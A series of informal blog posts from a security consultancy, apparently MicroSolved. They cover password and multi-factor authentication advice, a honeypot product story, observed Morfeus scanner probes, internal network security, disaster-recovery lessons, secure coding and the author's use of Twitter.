What Is A Good Password?

What is a good password? Well, that depends who the password is for and what the password is protecting. For a normal system user that only has access to limited amounts of information, services and software, the most important thing about a password is that it’s hard to guess and that they protect it properly. What can an outsider really get at, anyway, if they have a user level password? If the network is set up properly, an attacker can’t get to the internal network from the Internet. All they can get at are things in the DMZ like e-mail and web servers, right? And if the users are doing things right, any private sensitive information in their e-mail messages is strongly encrypted, so even if an attacker gets into the DMZ servers all they get is some information that is ancillary at best. So, for a normal system user the old eight digit password that uses all the different types of characters, isn’t a dictionary word, isn’t your wife’s middle name, etc. is just fine.

But, how about the folks who have system admin level access or who are granted remote access privileges? What is a good password for them? In my opinion, there is no such thing! No user name and password on their own, with no other authentication mechanism, is good enough for these levels of access. All the passwords in the world are still just something you know. You must use something you are or something you have to further authenticate yourself.

If a user has remote access privileges and their only authentication mechanism is a user name and password, what happens if it is intercepted or stolen? The attacker suddenly has a way into the internal network! Then they can use that password to get at juicier tidbits of information than they could find on an e-mail server. We all know that internal networks are never as well set up and secure as external networks. But even then the attacker will be limited to the information and services available at the user’s privilege level. Maybe the attacker can run some exploits or elevate their privileges a bit; that depends on just how poorly the internal network is secured.

But what if an attacker gets their hands on a system admin level user name and password, gets into the internal network, and there is no other authentication mechanism needed? Well, then, it’s pretty much game over! They can grab the password hashes, get at private information, set privileges, install Malware, erase records of their presence; pretty much anything they want!

So, if you are a normal user, make difficult to guess passwords and don’t let anybody else at them. If you are a remote user, use a strong password, but also use a token or something similar. If you are a system admin, you can’t use too many authentication mechanisms and they can’t be too strong! Use strong and long passphrases instead of simple passwords, change them every 30 days, use tokens, use positive IP checking, use software clients, use whatever you can get. But don’t just rely on your user name and password!

HoneyPoint:Network Trust Agent Helps IT Team Identify Serious Network Hole

We got a great story this week from a user of HoneyPoint:Network Trust Agent (NTA). This user touched base with us to let us know how his NTA deployment on his laptop helped his security team identify a critical network hole.

His story started as usual, he had downloaded NTA after one of our conferences and installed it on his laptop. He felt very strongly that it gave him unique insights into how safe he was as he traveled around and used a variety of public wi-fi and other networks. Users often tell us stories of catching various worms and scans with the product as they work from coffee shops, airports and hotels. Sure enough, the logs he sent us also showed the capture of several PHP scans and some other “wormy” activity against his laptop. He included that he has become a strong believer in “when the light turns red, it is time to go”.

But, his logs also showed us something else. He confided that his laptop had “gone red” while he was using his corporate protected network. Since this was unusual, he notified his network administration team. They, in turn, inspected his laptop and pulled his NTA log. Aghast, they found that the log contained evidence that an Internet host had attempted a telnet connection to his box. That should not be possible, since the firewall should be blocking all inbound telnet attempts. After a short discussion, the admin team analyzed the firewall rules and found a misconfiguration problem. Over the previous weekend, one of the administrators had needed to allow a remote vendor to telnet into a network device for some maintenance, however, the admin is question had applied the wrong netmask to the ACL on the firewall. This had inadvertently exposed the entire internal network to telnet probes from the global public Internet!

Obviously, the admin team took immediate action to properly configure the firewall and teach the administrator in question the proper method for ACL creation. They also began to look for other signs of intrusion and to examine the logs of routers, switches and other systems that could have been exposed to compromise from the error. After they had done a careful review and knew that they were OK, they took the time to have the gentleman let us know about their experience and thank us for the helping hand. “That may be the best 10 bucks we ever spent!”, one of the team members exclaimed.

Do you have a good story about how one of the HoneyPoint products has helped you? Have you caught malicious inbound traffic on your laptop at a coffee shop? If so, let us know.

If you are interested in learning more about HoneyPoint:Network Trust Agent, Personal Edition or our critically acclaimed Security Server product for enterprises, please feel free to email us at info<_at_>microsolved.com or give us a call. We would love to talk with you about how honeypot technologies and our products in particular can help you create effective, efficient and affordable security controls throughout your environment!

Morfeus Scanner soapCaller.bs Scans

Our HoneyPoint deployments have been picking up a recently added (August 08) scan signature from Morfeus, the bot-based web scanner, that has been around for a long time. The new scans were first detected on our consumer grade DSL/Cable segments in late August and have now also been seen on our Corporate environment sensors as well.

The scans check for “soapCaller.bs” and then “/user/soapCaller.bs”. Returning a 200 result code did not bring any additional traffic or attacks from the original source within 96 hours of the initial scans. In fact, returning the 200 did not seem to cause any change in behavior of the scans or any additional attacks from any source. Likely, this means that vulnerable hosts are being cataloged for later mass exploitation.

Morfeus scans are quite prevalent and can include searches for a number of common PHP and other web application vulnerabilities. Google searches on “morfeus” return about 259,000 results, including quite a few mentions of ongoing scans from the bot-net.

Here is a blog post that discusses using .htaccess rules to block scans with the morfeus user agent.

Morfeus has shown itself to be quite adaptive and seems to be updated pretty frequently by the bot-masters with new application attack signatures. The scanning is very widespread and can be observed on a regular basis across platforms and ISP types.

The soapCaller.bs page is a file often associated with Drupal content management system. There have been a number of vulnerabilities identified in this package in the past, including during our recent content manager testing project. Users of Drupal should be vigilant in patching the systems and in performing application assessments.

Blog Layout Plainess and Distributed, Syndicated Threats

Just got a great question about the visual layout of the blog page.

To answer the questionof why we don’t increase the “flash” of the blog page that RobM asked about, the answer comes from Marketing Guru Seth Godin – we want you to focus on the signal contained in the blog posts, not the “noise” that would enter into the equation if we added a bunch of screen gadgets, flair or other eye (and attention) grabbing stuff.

We hope that you read the blog to get information about the state of information security, technology/privacy issues and the other topics we cover here.

So, RobM, that’s the long and short of it. We want your attention to be focused on the quality of the content we deliver and nothing else. If you want to know what the latest weather forecast is, what virus alerts or the like are going on – check out one of the many information security “portals” out there. They are very high on gadgets, heads up displays and all kinds of other stuff. They certainly have their purpose, but they just present too much “noise” to “signal” for the vision of the MSI team.

That said, to keep this blog post more on topic than marketing strategy – have you ever considered the threats that could stem from syndication into things like portals? Imagine the cookie theft that be performed by a rogue entry in a syndicated RSS feed or other mechanism that got wide distribution. I know this has seen a POC in the past and I have tested more than a few RSS clients that were vulnerable to embedded XSS attacks.

One scenario that the team has discussed is the injection of XSS or the like inside of corporate feeds on the intranet. This could be a quick, easy way to gain several forms of access to a variety of internal web apps in an enterprise. Would your internal feed mechanisms catch the attack? Would your internal users be exploitable? If your organization has moved forward with embracing RSS feeds and other syndication techniques – this might be something to add to your next assessment.

Revision of Twitter Strategy

OK, I spent the last week or so working on my Twitter capability. But, I have to say, after a week, Tim Ferriss’s strategy of not following people really seems to be limiting the capabilities that Twitter seems to bring to the table in terms of information aggregation, conversation and leveraged crowd sourcing on ideas. So, effective now, I will start to follow key people who add good rapport, valuable information and good conversation.

Again, if you are interested in following me on Twitter, you can find me at http://www.twitter.com/lbhuston

I will continue to tweak out how I use Twitter and see if I can find a good leverage point for the tool. The more I learn, the more I will report back here, in the hopes of eventually being able to build a methodology of sorts….

Thanks again for reading the blog, tolerating the noise and being interested. Blogging and Twittering rank right up there with public speaking in my book. Being able to speak, teach and work with the public is one of the things that truly makes me “The Luckiest Guy In The World”(TM)…..

Google Trends Look at Vulnerabilities

This morning I ran a quick Google Trends look at three types of vulnerabilities: buffer overflows, SQL injections and cross-site scripting (XSS). The results are interesting to me, though certainly no shock.

You can view the graphs and data here.

What we see are spikes of interest in injections while both XSS and buffer overflow searches remain about the same level as they have for the last year or so. This is of course, no surprise, given the recent spate of injection compromises, defacements and malware attacks. What is interesting to me is the news graph. I did not think it would be so quite so spiky. There are a number of places where mentions in the press of both injections and XSS spike heavily. That is really good news, because it means that the mainstream press is covering those topics to a larger extent. The more mainstream press coverage the issues get, theoretically, the more awareness there should be of the topic.

Also interesting to me is that Indonesia shows up as the largest source for searches in injection and Malaysia is number 7. In XSS, Indonesia shows up at number 7, while Malaysia does not make the list. More than likely these search results are good indicators of the research and work involved between both countries in their “hacking war”, a sort of online cyber-conflict that has been taking place for the last few years without much mainstream media attention.

South Korea shows up on all of the lists as a popular source of search activity around the vulns, and some of the other countries on the list that should be drawing interest are Iran, Israel and India. Obviously, some groups in these countries are building some cyber capabilities, as they are searching on enough data to be listed. This brings up some interesting questions.

With detail analysis over long periods, perhaps this data would be useful for tracking the growth of capabilities in a given locale? Also, from a corporate security stance, is there any way that the data could be used in the short term to provide a focal lens for risk management? How could analysis of short term data be used to “forecast” potential areas of trouble in the near future? Does increased research of a topic area correlate with near future attack increases in that particular vulnerability family?

Further study into gaining intelligence from Google Trends is needed. There just might be a way to tap it for insight into emerging patterns and a deeper understanding of attack type prevalence and other indicators of underground strategic changes. Only time will tell how much power we can wring from this juicy cache of information. In the meantime, play with it a bit and see what interesting stuff you can find.

Why the Fuss over Securing My Internal Network?

I’ve often heard folks downplay the importance of securing their internal network, indicating that the real threat is from the outside, from external attackers, so why expend the effort?

When we think of threats we often recall the many stories of internet attackers who gain access through internet-facing systems and wreak havoc by stealing information from an externally-facing account, defacing websites, or causing denial of service. While these are serious threats I think we need to look deeper into the risk aspect of the problem and examine more critical potential for harm to the organization.

Internal systems in a network are by their nature easily accessible to employees to make it easy to conduct daily work and efficiency. Employees are for the most part trusted on the internal side and given free reign within that domain. While some level of trust is required to allow work to be completed, I believe that too much free reign creates unnecessary and unacceptable risk.

An internal attacker given too much free rein on a network can cause serious damage to an organization. Just take a look at the recent case with the city of San Francisco where a rogue system administrator brought the city network to its knees. We all know this threat is real, while somewhat rare, is a possibility and we need to provide some level of protection against it by implementing security measures on the internal side. This is the scenario I believe most people point to for justifying internal network security, but the relative rarity decreases our concern for action.

Despite the threat from a rogue insider, I would like to highlight an even more likely scenario that I believe makes a greater case for internal network security. This scenario involves an external attacker who gains credentials or permissions on the internal network. Many factors have significantly increased this threat in the past several years. The rampant use of remote access from outside the organization (VNC, VPN) and mobile devices opens up a huge array of avenues for these types of attacks. The sophistication of client-side attack tools, weak authentication credentials, social engineering, combined with the dizzying pace of keeping up with vulnerability patches makes our network defenses only a hack away from an internal breach. Once inside the network an attacker may have all the free rein your trusted employees do. If you weren’t attentive to internal security you could be in for serious trouble.

I assert that we should all make the assumption that the attack from the inside WILL happen at some point and you must make preparations for that eventuality. To do that I think you should consider a few broad recommendations: 1. Identify the sensitive information on your network and where it resides. 2. Determine who needs have access to that information to do their job. 3. Compartment the information and restrict access to only those who need to know that information. 4. Consider strategic implementations like anonymizing so that sensitive data is not presented where not necessary. 5. Implement strong and redundant access controls particularly for credentials that have wide-ranging access such as sysadmin accounts. 6. Don’t relax your high standards for access control and auditing on the internal network, don’t assume they are there only to guard against your trusted employees. 7. Independently test your system regularly to keep yourself honest in assessing your risk.

In summary, I suggest folks think differently about their internal networks, not as a completely secured safe zone where we can relax our defenses. Consider establishing point defenses around each sensitive system, not only protecting from the outside, but from within as well. Your inside attacker will likely be an outsider. Assume it WILL happen and you need to be prepared to minimize the damage when it does.

A Taste of Our Own Medicine…Real Life DR/BC Experience for the Assessors

It has been a turbulent last few days around MSI and in Central Ohio at large. On Sunday, we experienced the left overs of Hurricane Ike. Being in the mid-west, we were not quite prepared for what came our way. Wide swaths of the state experienced winds as high as those associated with a minor hurricane or tropical storm. Hundreds of thousands were left without power and damage to homes and property took a heavy toll. While the damage to our area was a minor issue compared to the beating that Houston and parts of Texas took – it was, nevertheless, a major event for us.

Today is 3 full days after the storm event here in Columbus and many remain without power and other “conveniences”. Grocery stores, gas stations and restaurants are just beginning to reopen in many parts of the city. Problems with various services and businesses abound. For example, many schools are still closed, several doctor and dentist offices still have no power and there are ongoing ups and downs for telephone services and ISPs.

Around MSI, we have been fighting the damage from the storm and Mr. Murphy. While we have been among the lucky ones to keep power on a stable basis, many of our team have been spending long hours in the conference room watching TV and playing video games after business hours. Many of them have no electricity at home, so this seems to be an easy way for them to spend some time. Our ISP has had two outages in the last two days. One was around 5 hours due to a power failure for some of the equipment that manages the “last mile” while the other was less than an hour this morning when their generator for their local data center developed an oil leak. Thankfully, both have been repaired within their SLA and none have interfered with our progress on engagements.

We have prepped our warm site for extended outages and just as we were about to activate it for these ISP outages, the connectivity returned. We have learned some lessons over the last couple of days about dealing with email outages, web presence outages and certainly gained some deeper insights into a few slight dependencies that had escaped us, even during our 2x per year DR testing. We still have some kinks to work out, but thankfully, our plans and practice paid off. We were prepared, the team knew our SLA windows for our vendors and our clients and our processes for ensuring continuation of engagements worked well!

We got to know first hand, exactly how good prep and good processes for DR/BC pay off. We took our own medicine and the taste wasn’t all that bad.

The moral of the story, I guess, is that DR/BC is a very worthwhile process. So the next time, we are doing an assessment for you and ask some tough questions about yours – don’t take it personally – as we said, we have learned first hand, just how worthwhile front-end investment can be.

Learn more about the storm:

News about the storm here.

American Electric Power outage map.

Local news.

PS – Special thanks to the folks who signed up for the State of the Threat presentation this morning. Sorry for the need to postpone it. We worked with Platform Labs throughout the day yesterday attempting to coordinate the event, but at the end of the day yesterday they still had no power. Thus, the postponement. Thanks for your patience and understanding on the issue. The good news is that Steve at Platform says they are back up and running as of this morning! Good news for Steve and everyone else!

“Secure Code” Will Save Us — Right????????

I know we have always preached that application security is much more cost effective when it is baked in. But, the reality of today’s application horizon is that security is an afterthought, at best, for a majority of web applications. A variety of reasons ranging from inexperienced developers to legacy technologies and from apathetic customers to security issues in core technologies have made this so. In fact, in our application security testing services we often encounter applications in production environments that fail to protect against attacks from 10 years ago!

The average development team we work with seems to be interested in fixing the problems, but often lack the basic understanding of how common attacks like SQL injection and XSS work. Without a basic understanding of the threats, how on earth can they be expected to protect against them? Recently, we spent more than four hours explaining the white list vs black list approaches to a certain development team who shall remain nameless. It took almost a half day of conference calls and email exchanges for them to understand how these basic approaches to filtering user input could be employed to protect their application against input validation attacks. It was not that they were not trying. The problem seemed to be that their application was developed by a small group of intern level programmers and the team members with real programming experience (the one(s) who had done the engineering and application design) were long since gone from the company or reassigned to other projects. Without experienced oversight and guidance, the interns had produced working code for sure, but without any underlying controls, security, availability or reliability!

Today, if we look at the marketplace, there are a ton of solutions attempting to bolt on security after the fact. Everything from code scanners to web application firewalls are emerging as controls to help organizations deal with web application security. One of the big problems with these technologies is that they require changes to the underlying source code, logic or web server environments. At the very least, WAFs act as a filtering device at the protocol layer, and many applications simply perform unreliably when a WAF is “protecting them”. What we really need is a reliable way to add security to web applications without changes to protocols, environments or logic.

Of course, the ultimate argument is that what we really need is secure code. I have read a lot of security pundits lately talking about how “secure code” is the solution. “Secure code” has become the latest battle cry, silver bullet, smoke and mirror trick and marketing hype. However, “secure coding” is not easy. It is not immediately available for most organizations – there is no switch to flip on your developers to make them churn out “secure code” – there is no ONE class or seminar you can send them to make them write “secure code”. Instead, it takes ongoing education, updates to existing code tools, frameworks and development environments. It will be a long, slow process. It will be a human process and it will be expensive.

Even then, once we get all of our programmers making “secure code”, there will still be problems. New attack formats will arrive. Legacy applications will still have old issues – some may be rewritten, but it won’t be cost effective for all web applications. New technologies and web enhancements will certainly degrade the security posture of even today’s most hardened web application. In other words – as you have heard me say before – Security is a journey, not a destination. We won’t get all of our code secure. We will never cross the line when all web apps are safe. We will simply move closer to a time when a majority of web applications are secure enough to meet our level of risk tolerance. Even then, that moment is likely fleeting. The center will not hold. The universe breaks down upon itself. Entropy is a true constant in the universe, even the security universe. The center will just not hold……

Want More Random Content and Noise in Your Life?

For those of you who want more random noise and content but just can’t get enough of it on the web, I have decided to take up this “Twitter thing”. 😉

Everyone keeps telling me that I need to do it, so I am trying hard to embrace it.

If you are interested in “following me” you can do so here: http://twitter.com/lbhuston

Two caveats: 1. There is likely to be a random element to the content and frequency of the feed. 2. There is likely to be a mix of personal stuff, marketing, security thought, musings, rants, etc. The twitter-sphere seems to encourage this mixture of transparency and actual deep work thought.

Lastly, I have decided to only follow two people thus far: Guy Kawasaki and Timothy Ferriss – two of my favorite authors. That said, if you don’t see me following you directly or decide to get offended if I don’t follow you – please excuse me ahead of time. So far, keeping up with the twitters from those two, attempting to add my own content and doing the day to day work of leading MSI seems to be consuming all of the cycles I have, so please don’t take it personally if I don’t follow you in return….

OK that’s about it for this post. If the last thing you would want in your life is more Brent Huston, don’t feel bad or anything. Believe me, I understand. 🙂

BTW – If you want to check out books by those two authors, they are both excellent. Their books have helped me build MSI and have even helped me gain some level of illusion of control over my personal life.